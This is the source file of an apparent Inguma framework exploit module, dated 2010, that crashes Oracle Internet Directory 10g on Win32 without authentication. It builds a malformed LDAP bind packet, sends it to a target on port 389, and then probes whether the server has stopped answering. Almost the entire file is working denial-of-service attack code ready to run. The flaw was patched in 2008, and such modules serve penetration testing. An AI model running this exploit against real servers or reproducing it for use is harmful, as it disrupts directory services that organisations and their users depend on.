#!/usr/bin/python

##      COraOidDos.py
#       
#       Copyright 2010 Joxean Koret <joxeankoret@yahoo.es>
#       
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#       
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#       
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.

"""
Oracle OID 10.1.4 Remote Denial Of Service for Inguma
"""

import sys
import time
import socket

from lib.libexploit import CIngumaModule

name = "oraoiddos"
brief_description = "Oracle OID 10.1.4 Remote DOS Preauth"
type = "exploit"
affects = ["Oracle Internet Directory 10g"]
description = """
Oracle Internet Directory 10g (any version) under Win32 is vulnerable to a 
preauthentication remote denial of service condition.
"""
patch = "Fixed in CPUJul2008"
category = "dos"
discoverer = "Joxean Koret"
author = "Joxean Koret <joxeankoret@yahoo.es>"

healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00"

class COraOidDos(CIngumaModule):
    target = ""
    port = 0
    waitTime = 0
    timeout = 1
    exploitType = 1
    services = {}
    results = {}
    dict = None
    interactive = False

    def checkHealth(self, hostname, port):
        print "  --> Wating 5 seconds"
        time.sleep(5)

        print "  --> Connecting to target..."
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((hostname, port))

        try:
            print "  --> Sending 'health' packet ..."
            s.sendall(healthPacket)
            print "  --> Trying to receive something..."
            data = s.recv(1024)
        except:
            err = sys.exc_info()[1]

            if int(err[0]) == 104:
                print "[+] Exploits works!"
                return

        if data != "":
            print "[!] Server is up and running :("
        else:
            print "[?] Server doesn't answer nothing. It works?"

    def oidDos(self, hostname, port):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            print "[+] Connecting to ldap://%s:%d..." % (hostname, port)
            s.connect((hostname, int(port)))

            print "[+] Sending packet..."
            s.sendall(packet)
            s.close()

            print "[+] Checking OID's health..."
            checkHealth(self, hostname, port)
        except:
            print sys.exc_info()[1]

    def run(self):
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 389

        self.oidDos(self.target, self.port)

        return True

    def printSummary(self):
        """ If the method run of the module returns True printSummary will called after """
        pass

